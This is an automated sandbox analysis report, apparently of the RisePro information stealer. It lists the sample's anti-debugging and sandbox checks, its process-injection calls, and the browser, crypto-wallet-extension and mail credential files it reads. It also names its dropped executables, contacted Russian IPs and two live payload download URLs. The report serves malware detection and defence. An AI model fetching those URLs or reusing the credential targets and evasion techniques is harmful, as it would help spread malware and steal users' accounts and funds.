Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nickname.utiitsl.comVMware20,11696487550
Source: file.exe, 00000000.00000002.4548516421.0000000005D30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}P
Source: file.exe, 00000000.00000003.3589404399.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWiN
Source: file.exe, 00000000.00000003.2399271235.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B46CC078*
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2336812668.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.4548751165.0000000005F30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000001.19041.2006_none_d94bc80de1097097\gdiplus.dll
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: billing_address_id.comVMware20,11696487
Source: file.exe, 00000000.00000003.2250524948.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242387737.0000000002A60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__=l{TW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .utiitsl.comVMware20,11696487550
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000003.2258745532.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2267558623.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2294313149.0000000002A60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__=l{TW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06401780 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 0_2_06401780
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418BB0 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00418BB0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004160B0 mov ecx, dword ptr fs:[00000030h] 0_2_004160B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004146B0 mov eax, dword ptr fs:[00000030h] 0_2_004146B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045D9F0 mov eax, dword ptr fs:[00000030h] 0_2_0045D9F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045D9F0 mov eax, dword ptr fs:[00000030h] 0_2_0045D9F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041AB90 mov eax, dword ptr fs:[00000030h] 0_2_0041AB90
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004094C0 OutputDebugStringA,GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree, 0_2_004094C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_064062B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_064062B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06406014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_06406014
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0640FC07

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418BB0 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00418BB0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06405D6C cpuid 0_2_06405D6C
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_06420227
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_064202FD
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_06415047
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_06420121
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_0641FFF8
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0641FC7F
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0641FC34
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_06402CC6
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0641FD1A
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0641FDA5
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004DC84D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_004DC84D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_063EC990
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected RisePro Stealer
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4548516421.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1432, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fAeDYcmqiE_joVxmGjCsOKI.zip, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\places.sqlite Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Remote Access Functionality
barindex
Yara detected RisePro Stealer
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4548516421.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1432, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fAeDYcmqiE_joVxmGjCsOKI.zip, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426792 Sample: file.exe Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 72 ipinfo.io 2->72 74 easy2buy.ae 2->74 76 db-ip.com 2->76 84 Snort IDS alert for network traffic 2->84 86 Multi AV Scanner detection for domain / URL 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 7 other signatures 2->90 9 file.exe 2 106 2->9         started        14 AdobeUpdaterV2.exe 2->14         started        16 MSIUpdaterV2.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 78 193.233.132.175, 49709, 80 FREE-NET-ASFREEnetEU Russian Federation 9->78 80 193.233.132.47, 49706, 49715, 50500 FREE-NET-ASFREEnetEU Russian Federation 9->80 82 3 other IPs or domains 9->82 64 C:\Users\user\...\VkHLTH_m2kErRb6vpA5n.exe, MS-DOS 9->64 dropped 66 C:\Users\user\...\IQUKpYR1BFFsqw1YWBOv.exe, MS-DOS 9->66 dropped 68 C:\Users\user\AppData\Local\...dgeMS2.exe, MS-DOS 9->68 dropped 70 8 other malicious files 9->70 dropped 98 Detected unpacking (changes PE section rights) 9->98 100 Query firmware table information (likely to detect VMs) 9->100 102 Tries to detect sandboxes and other dynamic analysis tools (window names) 9->102 108 12 other signatures 9->108 20 VkHLTH_m2kErRb6vpA5n.exe 1 9->20         started        24 IQUKpYR1BFFsqw1YWBOv.exe 9->24         started        26 schtasks.exe 1 9->26         started        36 3 other processes 9->36 104 Antivirus detection for dropped file 14->104 106 Multi AV Scanner detection for dropped file 14->106 28 schtasks.exe 1 14->28         started        30 schtasks.exe 1 16->30         started        32 schtasks.exe 1 18->32         started        34 schtasks.exe 1 18->34         started        38 2 other processes 18->38 file6 signatures7 process8 file9 62 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 20->62 dropped 92 Antivirus detection for dropped file 20->92 94 Multi AV Scanner detection for dropped file 20->94 96 Detected unpacking (changes PE section rights) 20->96 40 schtasks.exe 1 20->40         started        42 schtasks.exe 1 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 3 other processes 36->54 56 2 other processes 38->56 signatures10 process11 process12 58 conhost.exe 40->58         started        60 conhost.exe 42->60         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
193.233.132.47
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
104.26.5.15
 db-ip.com United States
13335 CLOUDFLARENETUS false
193.233.132.175
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
185.199.220.53
 easy2buy.ae United Kingdom
12488 KRYSTALGR false

Contacted Domains

Name IP Active
ipinfo.io 34.117.186.192 true
easy2buy.ae 185.199.220.53 true
db-ip.com 104.26.5.15 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipinfo.io/widget/demo/81.181.57.52 false
    		high
    https://easy2buy.ae/wp-content/upgrade/k.exe false
      		unknown
      http://193.233.132.175/server/k/l2.exe true unknown
      https://db-ip.com/demo/home.php?s=81.181.57.52 false
        		high